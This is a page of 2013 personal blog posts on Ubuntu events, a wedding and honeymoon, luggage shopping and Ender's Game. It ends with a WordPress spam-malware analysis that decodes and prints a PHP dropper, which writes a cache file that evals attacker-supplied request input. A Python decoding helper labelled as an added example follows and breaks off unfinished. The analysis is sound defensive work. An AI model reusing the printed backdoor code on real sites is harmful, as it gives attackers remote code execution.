Adopt a Salamander

May. 18th, 2013 02:47 pm
[personal profile] pleia2

For each Ubuntu release I spend a little time finding a toy or other representation of the codename animal to use at booths, Ubuntu Hours and other events. I wrote about Quetzals and Pangolins here and you may have seen Raring here.

When the salamander came up I was confident that a toy would be easy to find, and indeed they were! Even better, I found that the World Wildlife Fund offers a $50 Hellbender Salamander Adoption Kit that ships with 2 plush salamanders! Mine arrived yesterday, I’ll be keeping one to use at our events and will find a way to give away the other (perhaps as part of the Ubuntu Women contest we’re planning? Or at some LoCo event?).

Event decoration + helping to save the actual animal, hooray!

Oh, and it is a release late, but while I was in Mérida, Mexico we stopped in to Miniaturas where I picked up some adorable quetzal earrings:

I think I’ll wear them to our San Francisco Ubuntu Hour on June 12th, and bring along the salamander!

Originally published at pleia2's blog. You can comment here or there.

Downtime this morning

May. 18th, 2013 07:51 am
[staff profile] mark posting in [site community profile] dw_maintenance

(For some California local definition of 'morning'!)

About 30 minutes ago one of our databases (sb-db03) locked up and stopped serving traffic. This was an active database, so the site quickly stopped when it could no longer serve requests. Alas.

I have failed us over to a backup database and now everything should be working again.

I'm not sure yet what happened to db03, but am currently investigating and will update this post if I come up with a root cause for the problem. Edit: It's back up and doesn't have any visible problems. Disks are fine, data's intact, etc. The graphs and logs show nothing. We'll have to keep an eye on it and see if it manifests further issues.

Sorry for the trouble, please let me know if you still see any problems!

Virtual Ubuntu Developer Summit 1305

May. 17th, 2013 08:42 pm
[personal profile] pleia2

Since I left for my wedding and honeymoon a bunch of things happened! Ubuntu 13.04 was released, 13.10 was given the code name “Saucy Salamander” and Debian 7.0 Wheezy came out. Plus lots of exciting OpenStack development discussion that came out following the Summit (I left right after it). When I got back into the country on the 12th I had a lot to catch up on! I did my best to cram before sessions and certainly had to limit involvement to a handful of sessions that I was particularly keen on attending and so could get up to speed with quickly.

This was the first virtual UDS I was able to participate in, so it was all new to me. Essentially the “fish bowl” (as seen here, I took this photo from my spot in the wider attendee seating) is replaced by a Google Hangout and the “wider attendee seating” is an IRC channel. For the 4 sessions I participated in this worked very well, session leads were pro-active about asking who wished to participate in the Hangout so everyone who wanted to was able to. A great deal of attention in all these sessions was given to the IRC channel, which is a contrast with in person UDS where the channel can sometimes get a bit left behind (even though it’s being projected, it was easy to forget once you get talking). I didn’t use the summit.ubuntu.com page for anything aside reference, preferring to pop out the etherpad and use my standard IRC client, but I appreciated it all being there as a resource (and I’m sure it was super helpful for newcomers to follow along!).


Cheri Francis and others in the Ubuntu Women session

I found the sessions I participated in to be productive and focused and when applicable resulted in a solid list of action items. I hope that the event also lessened the experience gap that was always present for in person vs. remote participants, we all got the same experience. Now I have to admit to not being a fan of using Google Hangouts for this (I like Google, but it is still a proprietary, closed-source tool that we have no control over), but I understand that the ease of use and immediate availability of videos on YouTube makes a compelling case. Perhaps my only other complaint is lack of cohesiveness that comes from an online event, I didn’t watch the introduction or the wrap up. I also didn’t participate in the “beer hangout” – I didn’t even know it was happening, and sitting in front of my computer with a beer in the middle of the day wasn’t particularly interesting to me. I only attended a few specific sessions and there was no “wandering into something that looks interesting” (instead I just went back to work) or the regular social down time we get to relax or sit down to hack on things. I do hope we can find some kind of replacement for the in-person events, it would be great to see something on the LoCo team level at conferences where we seek to have an expanded Ubuntu presence focused on contributors (perhaps an Ubucon with a participant track?).

And the venue… it was at home! In order to participate in the hangout I did feel the need to leverage my multiple monitors.


My desk is a bit chaotic

Now the sessions themselves…

– Planning for Ubuntu Community presence on the Ubuntu Website –

This was not a particularly productive session as far as action items were concerned, but it turns out that while I was gone the removal of the “Community” link from ubuntu.com took on a life of its own (and boy was I surprised to see my name end up in a recent Datamation article about it). Personally I was satisfied with Daniel Holbach’s blog post on the subject a day after the change was made, but it was nice to speak with some folks from the Design team and allow everyone to confirm that no ill will was intended and that plans for a new and improved community site were moving forward. The session was kept short given the more structured session about the community site specifically planned for the following day.

YouTube video of the session here

– Ubuntu Women UDS-1305 Goals –

Huge thanks to Silvia Bindelli and Cheri Francis for doing all of the leg work for this session while I was gone, I felt very comfortable reviewing their pre-session notes and found a really great, collaborative environment upon joining in. The discussion began talking about an information scavenger-hunt competition that the team will be doing in the coming months, seeking volunteers to assist. It then moved into a topic that I was really happy to see on the agenda – a user poll to see how the team could be most effective in serving our audience of women interested in Ubuntu. I find that the project needs a bit of an adjustment every couple of years to refocus on our current targets as Ubuntu and the open source ecosystem evolves, so I’m excited that we’re doing this. Finally, much of the session was spent discussing our intention to further collaborate with other groups seeking to encourage women in open source (and in technology in general).

YouTube video of the session here and I uploaded session notes here

– Revamping ubuntu.com/community –

Picking up from where discussion left off the previous day, this session was focused on concrete things that need to be done to get the proposed community website that was under development reviewed and published. I admit that job change + wedding planning had my attention diverted this past cycle so I wasn’t able to contribute to this project, but I made sure to spend time the night before to do a review of the content so I’d be prepared. I was able to go through some of my suggestions during the meeting and took a few action items to continue with a more thorough review and to collect some quotes and photos from the community to make the site more personal and approachable.

YouTube video of the session here and I uploaded session notes here

– Shaping a plan for the future of Ubuntu Documentation Team –

I can’t begin to say how pleased I was to see this session land on the agenda. The Ubuntu Doc team has been a very small team for a long time, and new contributors have struggled to participate as the docs for writing the docs got stale to a point where they were not useful. We’re at a very exciting time now where we have limited support from a couple of the (very busy!) former drivers of this team and at least two strong contributors who have committed to moving the project forward. The first thing on the agenda was addressing the updating of docs so that more contributors can get on-boarded. I was able to pitch in with a couple action items to nudge things along a bit, but I’m hopeful that this is the beginning of an exciting new phase for the team.

YouTube video of the session here and I uploaded session notes here

Slimy Salamander (Plethodon glutinosus)
A Slimy Salamander (wait, you said Saucy?)

– Xubuntu –

Since the event was online, the Xubuntu team took advantage of the flexibility and ended up pulling their sessions from UDS proper and scheduling our sessions for the hour after UDS each day to tackle a series of blueprints designed for the coming months. I was able to use my YouTube account + Hangouts to replicate that portion of what main UDS was doing.

Discussion of most interest to me centered around our testing+release plans (should we do alphas? betas? which ones?) and documentation, but discussion of our limited developer force (want to grow it!), a proposal for a shortcut overlay and default applications also were discussed. A much better summary was posted on the Xubuntu website yesterday: Looking towards Xubuntu 13.10. Pasi Lallinaho also wrote bullet-point style summaries of Night 1 and Night 2 which include links to their respective YouTube videos.

In all, a productive UDS for me, I have a lot of work to do… :)

Originally published at pleia2's blog. You can comment here or there.

Honeymoon week 2

May. 17th, 2013 08:40 pm
[personal profile] pleia2

The second half of our honeymoon was full of adventure (and ok, a bit more luxury). We decided to spend 5 days traveling through the Yucatan peninsula visiting Mayan ruins, cenotes and local cities. We wanted our visit to be stress-free so MJ did some research and found William Lawsons Personal Driving Service which would not only take us around the peninsula but our driver would also be a registered tour guide! We met our guide, Angel, at the resort on Tuesday morning to begin our adventure.

Our first visit was to the ruins of Ek’ Balam. This was a really cool site, with multiple structures to climb, including the huge main temple. It wasn’t until I climbed to the top that I fully appreciated how hot it was out (and that I hadn’t brought enough water!).

More photos from Ek’ Balam

I was pretty tired after wandering around those ruins in the heat, so I was delighted when our tour guide was able to find Cenote Hubiku, just north of Valladolid where we were spending the night. A cenote is “a deep natural pit, or sinkhole, characteristic of Mexico, resulting from the collapse of limestone bedrock that exposes groundwater underneath” (wikipedia). There are thousands in the Yucatan and many that are equipped for people to swim in. Cenote Hubiku had a small admission fee and full, modern facilities for changing before swimming. We caught them at the tail end of their day, but got a good 20 minutes of swimming in the beautiful, cool cenote before being on our way. It was the perfect thing for post ruin exploration.

Photos from Cenote Hubiku.

For dinner we went to Taberna de los Frailes for a delicious dinner that included a grilled watermelon with cheese appetizer (which I wouldn’t have ordered, but the waiter recommended it). We retired for the night at Casa Hamaca Guesthouse which was a cute little inn in the heart of Valladolid. Even better, the proprietor Denis Larsen is a northeast US expat who was exceptionally welcoming and helpful the next morning as we enjoyed banana pancakes and chatted about everything from our shared love of Google Docs for collaboration to tips for the rest of our stay in the Yucatan.

We then spent the day exploring the beautiful city of Valladolid. We visited the small San Roque Museum and then spent some time walking around the main square. From there we did some shopping and I picked up a couple of the traditional embroidered blouses that Valladolid is famous for. We also got a couple of brimmed hats for further ruin exploration. Mid-day we met up with Angel who took us to the Convent of San Bernardino de Siena and Cenote Zaci – a cenote right in town! We didn’t swim but it was nice to visit.

Photos from Valladolid

Come late afternoon it was time to start driving toward Mérida to check in to Hacienda Xcanatun boutique hotel for the night. This former hacienda was one of the many in the region that used to be a sisal (fiber) plantation. This was my favorite hotel. The rooms were sprawling and while modernized, still held an architectural feel and basic layout similarities to what I’d expect from an old hacienda. We had dinner at their famous on-site restaurant of the same name.

Photos from Hacienda Xcanatun

The next day was Uxmal! Plus a couple other sites on the Puuc Route. Uxmal was a major city and so touring the ruins takes several hours. We managed to see most of it and had a lot of fun climbing around several of their major structures (only the largest and a few minor sites had climbing prohibited). This site really rivals Chichen Itza in how big and amazing the ruins are, definitely one of my favorites.

More photos from Uxmal

Next on our list to visit for the day was Kabah. Most amazing about this place was its famous “Palace of the Masks” which was a whole building covered on one side with ornate faces of stone. You’re allowed to climb up to and around the palace, making this probably my favorite small site we visited.

More photos from Kabah

The last ruin site we visited was Sayil where we just visited the Palace of Sayil (the site was very spread out, with buildings up to 1 mile apart). Like so many of these palaces, it was an impressive and imposing sight! No climbing up the structure allowed though.

Photos from Sayil

Our final new site of the day was the Ecomuseo del Cacao. Our first hint that this place wasn’t quite up to par with the rest of our day was the clue from Angel that, while a traditional Mayan thing, cacao doesn’t actually grow naturally in the Yucatan because it’s not humid enough. The museum had its moments but was a bit too polished and cheesy. It was nice visiting the grove of artificially maintained cocoa trees and the hot chocolate tasting at the end was probably worth the entrance fee.

Photos from Ecomuseo del Cacao

From there we headed back to Uxmal for a sound and light show. I hadn’t read great things about it online, so I was prepped for something really cheesy, but I admit having really enjoyed it. The main track being broadcast is in Spanish, but you can rent headphones in several languages so you can hear the stories going along with the show that paint a picture of what it may have been like in the height of civilization there. It was also then that I noticed how beautifully clear the sky was out there, you could see so many stars.

That night we checked into Hacienda Temozon. It was a beautiful property, advertisements for it are quick to tell you that Bill Clinton stayed there once and the only owned by a major American company. The rooms were large, but it turns out perhaps not the right place to stay during ant season. Staying true to some of the age of the place, it didn’t have glass on the windows so everything was quite open-air and the doors covering the windows didn’t seal (you could put your finger through some of the gaps). I did enjoy a wonderful Mexican omelette in the morning.

Photos from Hacienda Temozon

Angel picked us up in the late morning and, knowing our interest in cenotes, decided to take us to a less touristy one that he knew of, Cenote Kankirixché. It wasn’t a fancy, staffed cenote like the previous ones we’d been to, we had to change in the van and then it was just a hole in the ground and a somewhat questionable wooden staircase taking you down to the water. It was beautiful and refreshing though!

More photos from Cenote Kankirixché

From there we were off to the city of Mérida! First stop was to check in to the stunningly modern Rosas and Xocolate boutique hotel before heading across the street to the Anthropology and History Museum. The museum is located in the former Canton Palace and while all in Spanish the exhibits mostly spoke for themselves. My favorite exhibits were one of one of the earlier expeditions to the Yucatan where many of the Puuc sites we explored, seeing photos from those sites before they were uncovered and restored was really cool. They also had a local embroidery exhibit upstairs which, seeing them in context, made me really happy about my beautiful blouse purchases in Valladolid.

Then it was off to the Grande Plaza district of Merida where we had lunch at Amaro. We did some shopping and were able to visit the Casa de los Montejo and the Palacio de Gobierno with its captivating murals by Fernando Castro Pacheco. We enjoyed dinner back at the hotel and in all a relaxing night.

Photos from Mérida

Unfortunately the adventures had to come to an end at some point, our last day was spent visiting the famous Chichen Itza.

Chichen Itza is a huge settlement and we spent over 3 hours exploring it. It was more crowded than any of the other sites we went to, but the benefit of going in the hottest part of the year is that it wasn’t overwhelming with people at all. One of the interesting things about it though was while it’s expensive for tourists to enter (up to 5 times as much as other sites), the whole inside was filled with vendors! Angel told us it was because it used to be privately owned and the owner brought in all these vendors, and when it was transferred to more government run thing they kept the vendors. At first it was a little off-putting to have so many vendors throughout the archaeological site, but I came to realize that these vendors were selling on-topic keepsakes that tourists (including myself) were interested in buying, and technically these people are descendants of the Mayans who built this city – this is theirs. It also brought a liveliness to the site that was lacking at the other sites, I appreciated them by the time we were wrapping up our day there. And what a day. You couldn’t climb any of the ruins but it’s probably for the best, even just walking among these giants in the heat was enough to tire me out considerably.

More photos from Chichen Itza

We spent our last night in Mexico in Cancun so we’d have easy access to the airport the following morning. MJ picked a hotel on the beach where we could have a romantic private cabana dinner. Perfect wrap up to our honeymoon :)

Originally published at pleia2's blog. You can comment here or there.

Ender's Game is morally repugnant

May. 17th, 2013 12:21 pm
[personal profile] bokunenjin
As I hear friends and acquaintances express eagerness to see the Ender's Game film that will be released this fall, I have a hard time responding. I want to ask, have you read the book? After you were fifteen years old? And you enjoyed it? I can't understand how it won the awards it did. It's not just poorly written, it's repugnant. John Kessel articulates why in his essay Creating the Innocent Killer: Ender's Game, Intention, and Morality. An excerpt:
We see the effects of displaced, righteous rage everywhere around us, written in violence and justified as moral action, even compassion. Ender gets to strike out at his enemies and still remain morally clean. Nothing is his fault. Stilson already lies defeated on the ground, yet Ender can kick him in the face until he dies, and still remain the good guy. Ender can drive bone fragments into Bonzo’s brain and then kick his dying body in the crotch, yet the entire focus is on Ender’s suffering. For an adolescent ridden with rage and self-pity, who feels himself abused (and what adolescent doesn’t?), what’s not to like about this scenario? So we all want to be Ender. As Elaine Radford has said, “We would all like to believe that our suffering has made us special—especially if it gives us a righteous reason to destroy our enemies.”

But that’s a lie. No one is that special; no one is that innocent. If I felt that Card’s fiction truly understood this, then I would not have written this essay.

Honeymoon week 1

May. 16th, 2013 08:42 pm
[personal profile] pleia2

On Tuesday the 30th we flew from Philadelphia to Cancun, Mexico. From there we took a shuttle south for about 40 minutes until we got to the Riviera Maya district and Grand Velas, the all-inclusive resort we had reservations at for the first week of our honeymoon.

We then spent a much-needed week relaxing.

We had a stunning view from our room.

Hours to spend relaxing on the beach, or in one of their several pools where they brought us all the food and beverages we wanted.

Plus, chocolate strawberries.

I read my way through several books that I’d been wanting to read but never could find time for. Pretty much the only decision we needed to make all week was which of the top notch restaurants they had on site for each meal. I quite enjoyed room service for breakfast.

More photos from our stay: http://www.flickr.com/photos/pleia2/sets/72157633490351996/

We did end up making one excursion during the week, and that was to Rio Secreto, a nearby series of underground caves and waterways. I wasn’t sure what to expect since it was quite close to such a touristy area (tourist trap?) but my expectations were surpassed in all ways. We were geared up with water shoes (we opted to buy new ones for $10/pair), helmets and wet suits and we had a great tour guide, but it was far from a risk-free, polished tourist experience. We got a real feel for the natural caves and we had an amazing time swimming through some of the pools we were taken through in our 3 hour tour through 600+ meters of cave.

A photographer came along with to take photos and we paid the charge to download them all royalty-free, I uploaded several of them here: http://www.flickr.com/photos/pleia2/sets/72157633479166189/

Alas, the luxurious stay had to come to an end at some point. The following Tuesday we packed up… but not to end our honeymoon! Instead we repacked to spend the next 5 days traveling through the Yucatán visiting Mayan ruins and modern Yucatán cities! But that’s for the next post…

Originally published at pleia2's blog. You can comment here or there.

Our wedding!

May. 15th, 2013 09:27 pm
[personal profile] pleia2

On Sunday April 28th MJ and I were married!

The day began gathering with mothers, my aunt and the bridesmaids in the bridal suite of the Joseph Ambler Inn where we and most of our out of town guests stayed. Inn Manager Keenan Christiansen and Brian Cottman really made us feel welcome throughout our stay and during all the planning.

My maid of honor, Danita Fries, took care of morning makeup and hair preparations, bringing in Daneene Jensen and her team to take care of hair and makeup for all of us. Not being a makeup person, I wasn’t thrilled about the idea of wearing it, but Daneene made me feel comfortable and was great about keeping the makeup light and the look very natural. MJ’s Best Woman even stopped by with refreshments in the late morning so we wouldn’t be without lunch.

We met with our photographer, Melissa Morelli, at 1PM to begin taking photos at the inn. She was the photographer MJ hired for our engagement and a few months back she also did my head shots. We were really happy to have her join us in Pennsylvania for the wedding.

After photos at the inn, we took a small bus chartered by 1st Class Transportation over to the wedding venue, Talamore Country Club.

The weather was beautiful, which was quite fortunate as the wedding was outdoors and Melissa was able to take some great pictures throughout the venue before the ceremony.

Everything began with the signing of the Ketubah we selected by Amy Fagan of 20th Century Illuminations and the Badeken.

Then, the ceremony! We went back and forth about having a videographer for our wedding and decided to go with one from the Mixed Media Productions, the firm our DJ, Mike Robertson, runs. In retrospect I’m glad we decided to have one, the photos are great but I was so overwhelmed (happy! excited! nervous!) that I can’t say I actually remember that much of the ceremony :)

It all went very smoothly. My mother and grandfather walked me down the aisle. We were honored to have Rabbi Elliot Holin work with us on the ceremony and finally to officiate.

We also held our reception at Talamore, starting with a cocktail hour in the garden room (this room was also backup for ceremony had it rained). Then dinner in their main ballroom which was decked out with the amazing flower centerpieces by Moles Flowers.

The rest of the reception was also pretty traditional, short speeches from family and friends, a first dance and cake! We selected a multi-flavor cake from Bredenbecks and I made sure to have a bit of each ;)

And in addition to being able to talk to many of our guests, we even danced a bit! It was an amazing night.

Afterwards we had a bit of an after party back at the Inn, giving us time to kick back and relax for a couple hours with some of our guests.

In all, things went as perfect as I could have imagined thanks to MJ’s attention to detail throughout the process along with some great vendors who were able to work with us on requests.

We’ll be updating our website in the coming weeks with tons more photos and other details of our wedding weekend which included family and wedding party dinners.

Originally published at pleia2's blog. You can comment here or there.

Scooter luggage and travel cosplay.

May. 14th, 2013 02:17 am
[personal profile] terriko
Luggage with a built-in scooter is awesome. I've seen ride-on wheeled luggage for kids (and coveted it mightily), and this appears to be the adult-friendly equivalent. Sadly, does not meet a lot of my other criteria (I'd be shocked if they let me avoid gatechecking this) and it's $250 (But at least shipping is free...). I'm tempted just for the awesome factor.


Here's a small hard case that meets a lot more of my criteria. It clocks in at 35cmx39cmx23cm (that's 14"x15"x9" for those of us who have to fly in America) and comes in cheerful colours. I'm actually not sure which one I'd choose -- normally I shun the pinks but that dark one is pretty lovely and would fit nicely into some sort of business-travelling fashionista persona if I dressed the part with some business casuals. But maybe the green or red would be less likely to clash with my existing wardrobe.... Honestly, I'm approaching this project much like I do cosplay, and now that I think about it it's not really that different: I'm playing for an audience to believe me to be someone very specific. Nevermind that I'm still projecting a variant on me; it's all the same body language, fashion, and carefully chosen accessories that make it work.

Similarly, a bright orange gem that could probably work with the persona too. 36x44x20cm (14x17x8") for that one, and only two wheels tucked into the edges so probably a bit more packing space in the final tally.

But despite the obvious appeal for my in-progress traveler persona, I'm not seeing any useful way for me to get reviews of these that I can actually understand since they're shipping from Hong Kong, and I haven't quite decided if I really should be making a hundred dollar gamble just because the colours are fun. I wonder if it's possible to find something similar that's at least a little more local to me? I have learned the useful new search terms "rolling business case" but it's mostly been turning up uninspired blackness.


Incidentally, I *did* check the wirecutter and they do have a section on bags, just not the kind I'm looking for. Bags are one of those few things I'm exceptionally picky about (especially right now while mildly injured, but even when not I tend to have precise requirements) so it probably isn't that much of a loss. They're apparently looking for a freelance bag editor and I rather wish I were actually the right person for that job. Lot of work for little pay, but a chance to try lots of bags!

Conversations

May. 13th, 2013 06:30 pm
[personal profile] puzzlement posting in [community profile] incrementum
One of V's favourite gambits at the moment is flat-out contradicting me.

"Yes, that goes on the left foot, good." "No, that's the RIGHT. It's the RIGHT!"

This afternoon I asked him to put yoghurt back in the fridge so it would be nice and cool, he said "NO, nice and WARM."

Smaller travel bags

May. 9th, 2013 11:47 am
[personal profile] terriko
I currently own a 20" rolling carry-on bag that has met my airline & train travel needs for years (I switched to it a year or two before airlines started charging for checked bags), and it's perfect for a week-long conference where I'm coming back or going out with a lot of stuff, or when I'm visiting my parents for close to a month at Christmas, but it seems excessive when I'm going for a weekend trip or a job interview.

I'm considering getting a smaller suitcase for those shorter trips, so I'm working out my requirements. This thread covers more or less what I have in mind, but here's some personal preference/requirement notes:

1. Must have wheels. I used to do backpack+purse for shorter trips, but I've been finding that I often pinch a nerve during travel and I'm pretty sure carrying my camera/laptop on my back is a factor.

2. Can fit my laptop and possibly SLR camera + 2-3 days worth of clothes. Thankfully my clothes are pretty small. Camera may be optional: I'm trying a downgrade to a point and shoot for short trips.

3. Preferably I'd like something that can fit into the overhead bin on the smaller regional jets, since often my flight will have one hop with those. A search says that this means the bag will have to be around 18Lx14Wx7D. Sounds like you can fit larger, but I'd rather not have to argue it out with the gate staff / flight attendant every time. I am perfectly ok with being given a checked tag and then "obliviously" carrying my bag on the plane anyhow as long as it will fit, though.

4. But not arguing with the gate/flight staff every time I fly would be awesome. This may mean going with something more backpack-like so I can just put it on my back when I walk on the plane, but mostly it just reinforces "small" and "looks like it holds a laptop." Briefcases should work.

5. Should have an open clothing section as opposed to a bunch of filefolder divider things that will make it harder to pack.

6. Should open fully, at least for the clothing section. Pure preference on my part.

7. I'm not too picky about laptop sleeves, although something I can easily slip a laptop out of for the TSA or in case I do have to check the bag is good. I basically never use my laptop on the plane, I just don't want to skycheck it.

8. If at all possible, not black. Something like 90% of the suitcases I see are black and I don't want to be worrying about someone grabbing mine by mistake.

9. But (and I realize this may contradict the "not black" thing) something that looks more business traveller-y would be good. I have a *lot* of trouble with TSA reps assuming I'm young or an infrequent traveler which is especially frustrating when I go somewhere with J and they immediately assume he's an expert while I get the "oh, hon, you know our machines are perfectly safe?" talk-down-to-the-little-girl spiel. (My new response: "My sister is a physicist who works in health and safety; I'd like to opt out." which is factually true but irrelevant and calculated to throw them and possibly nearby travelers out of their default headspace without getting into an argument.)




I've been finding that
(a) A disturbing number of online sites don't give pictures of the inside of the bags.
(b) A disturbing number of online sites don't give dimensions or even pictures that could help me guess the dimensions
(c) Bags are expensive (duh)
(d) There is an entire market for "women's suitcases" which I find somewhat strange. Particularly given that the "women's briefcase-bags" seem pretty much identical to the non-women's ones.



I don't have any short trips scheduled, but I'm hoping to find some bag options I like and catch a sale (luggage goes on sale quite frequently, so it's a bit ridiculous to pay full price if I've got time to spare).

I would love to hear first hand testimonials from any of you who travel with a bag that might meet my needs, though. It was a recommendation from Linuxchix that drew me to my current bag which has done me pretty well although it's starting to show its age now.
terriko: (Default)
[personal profile] terriko
WARNING: This entry contains some actual malicious code. I've HTML-escaped it so that it isn't going to get executed by you viewing it, but it was clearly intended to attack Wordpress blogs, so if you're going to mess around with analyzing, do it in a browser that's not logged in to any Wordpress blog.


So I was clearing spam queues this morning, and came across a bunch of spam with this string in it:


eval(base64_decode(‘[base64 string omitted]′));


Or this clearly related one (note that the top of the string is the same):

[base64 string omitted]


As you can tell from the first sample, it's base64 encoded... something. b64 is pretty commonly used by attackers to obfuscate their code, so in case the spammy username and comment that went with the code wasn't enough to tell me that something bad was intended, the b64 encoding itself would have been a clue. If I didn't have the pretty huge hint of the base64_decode line, I might have been able to figure it out from the format and the fact that I know that b64 uses = as a padding (visible at the end of the second string).

Being a curious sort of person, I decoded the first string. In my case, I just opened up Python, and did this:


>>> import base64
>>> base64.b64decode(badstring1)
"if($f=fopen('wp-content/cache/ifooag.php','w')){fputs($f,'<?php /*N%P`%*/eval/*If\\',-*/(/*>6`He*/base64_decode/*@M)2*/(/*~:H5*/\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'/*OzM520*/./*9J+,*/\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'/*yAt&*/./*@5Dw&]N*/\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'/*Yabk*/./*O~qs*/\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'/*{YJ}1*/./*v+(-;k*/\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'/*(kCp@Y>*/)/*`bc*//*Hv^!*/)/*WmF*//*P_We``>{*/;/*-|lTE1*/?>');fclose($f);}"


(Well, okay, I actually ran cgi.escape(base64.b64decode(badstring1)) to get the version you're seeing in this blog post since I wanted to make sure none of that was executed in your browser, but that's not relevant to the code analysis, just useful if you're talking about code on the internet)

So that still looks pretty obfuscated, and even more full of base64 (yo, I heard you like base64 so I put some base64 in your base64). But we've learned a new thing: the code is trying to open up a file in the wordpress cache called ifooag.php, under wp-content which is a directory wordpress needs to have write access to. I did a quick web search, and found a bunch of spam, so my bet is that they're opening a new file rather than modifying an existing one. And we can tell that they're trying to put some php into that file because of the <?php and ?> which are character sequences that tell the server to run some php code.

But that code? Still looks pretty much like gobbledegook.

If you know a bit about php, you'll know that it accepts c-style comments delineated by /* and */, so we can remove those from the php code to get something a bit easier to parse:


eval(base64_decode(\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'.\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'.\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'.\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'.\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'));


Feel like we're going in circles? Yup, that's another base64 encoded string. So let's take out the quotes and the concatenations to see what that is:


[base64 string omitted]


You might think we're getting close now, but here's what you get out of decoding that:


>>> base64.b64decode(badstring1a)
"/*wc`;p*/if/*w!n[*/(/*^s[!TrpQ*/isset/*PH49|@*/(/*x`jV)N*/$_REQUEST/*r x*/[/*(~Qq*/'c'/*1?@et[*/./*=,)*/'z'/*uTA93*/./*C{G:@4\\*/'l'/*8t o*/./*myM=<D`*/'z'/*xgg1v61*/./*VpIg4*/'y'/*e|jyA*/./*,v(*/'l'/*F-QoL4*/]/*bakM)*//*\\;sn*/)/*NwKI'_*//*O_k*/)/*H@aK4T*/eval/*2N|20>*/(/*UsHmY]eZ*/stripslashes/*<Hg3*/(/*UAKaf*/$_REQUEST/*V.KT {*/[/*K-.c*/'c'/*Hoh*/./*XN;G*/'z'/*;&3(21d&]*/./*;POu*/'l'/*YYP3zu*/./*UliU-*/'zyl'/*FTY\\4*/]/*N?Rb>+f*//*K+KC*/)/*l@j*//*bX<*/)/*:Z6UE(JB8*//*BWg;@K*/;/*E;+v'I*/"


Yup, definitely going in circles. But at least we know what to do: get rid of the comments again.

Incidentally, I'm just using a simple regular expression to do this: s/\/\*[^*]*\*\///g. That's not robust against all possible nestings or whatnot, but it's good enough for simple analysis. I actually execute it in vim as :%s/\/\*[^*]*\*\///gc and then check each piece as I'm removing it.

Here's what it looks like without the comments:


if(isset($_REQUEST['c'.'z'.'l'.'z'.'y'.'l']))eval(stripslashes($_REQUEST['c'.'z'.'l'.'zyl']));


So let's stick together those concatenated strings again:


if(isset($_REQUEST['czlzyl']))eval(stripslashes($_REQUEST['czlzyl']));



Okay, so now it's added some piece into some sort of wordpress file that is basically just waiting for some outside entity to provide code which will then be executed. That's actually pretty interesting: it's not fully executing the malicious payload now; it's waiting for an outside request. Is this to foil scanners that are wise to the type of things spammers add to blogs, or is this in preparation for a big attack that could be launched all at once once the machines are prepared?

It's going to be a request that starts like this: http://EXAMPLE.COM/wp-content/cache/ifooag.php?czlzyl=

Unfortunately, I don't have access to the logs for the particular site I saw this on, so my analysis stops here and I can't tell you exactly what it was going to try to execute, but I think it's pretty safe to say that it wouldn't have been good. I can tell you that there is no such file on the server in question and, indeed, the code doesn't seem to have been executed since it got caught in the spam queue and discarded by me.

But if you've ever had a site compromised and wondered how it might have been done, now you know a whole lot more about the way it could have happened. All I can really suggest is that spam blocking is important (these comments were caught by akismet) and that if you can turn off javascript while you're moderating comments, that might be the safest possible thing to do even though it makes using wordpress a little more kludgy and annoying. Thankfully it doesn't render it unusable!

Meanwhile, want to try your own hand at analyzing code? I only went through the full decoding for the first of the two strings I gave at the top of this post, but I imagine the second one is very similar to the first, so I leave it as an exercise to the reader. Happy hacking!
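The manual steps in the post above (decode, strip comments, join the split strings, repeat) can be automated as a static pass that never executes the PHP. This is an added example, not code from the original post; the sample input is constructed and harmless, the file name `constructed.php` and parameter `demo` are made up, and the comment pattern is non-greedy so it also copes with a `*` inside a comment.

```python
import base64
import re

COMMENT = re.compile(r"/\*.*?\*/", re.S)      # non-greedy: copes with '*' inside a comment
CONCAT = re.compile(r"\\*'\s*\.\s*\\*'")      # 'a'.'b' or \'a\'.\'b\' -> one literal
B64_CALL = re.compile(r"base64_decode\(\s*\\*'([A-Za-z0-9+/=]+)\\*'\s*\)")

def strip_noise(php):
    """Drop C-style comments, then merge string literals joined with '.'."""
    return CONCAT.sub("", COMMENT.sub("", php))

def peel(php, max_layers=10):
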